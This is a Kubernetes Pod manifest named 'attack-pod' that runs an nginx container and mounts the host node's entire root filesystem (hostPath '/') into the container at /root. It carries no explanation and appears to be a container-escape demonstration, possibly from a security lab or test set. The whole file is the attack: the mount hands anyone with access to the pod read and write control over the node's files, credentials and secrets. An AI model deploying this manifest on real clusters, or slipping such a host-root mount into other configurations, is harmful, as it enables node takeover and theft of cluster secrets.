apiVersion: v1
kind: Pod
metadata:
  name: attack-pod
spec:
  volumes:
  - name: shared-data
    emptyDir: {}
  - name: test-volume
    hostPath:
      path: /
  containers:
  - name: nginx
    image: nginx
    volumeMounts:
    - name: shared-data
      mountPath: /usr/share/nginx/html
    - name: test-volume
      mountPath: /root

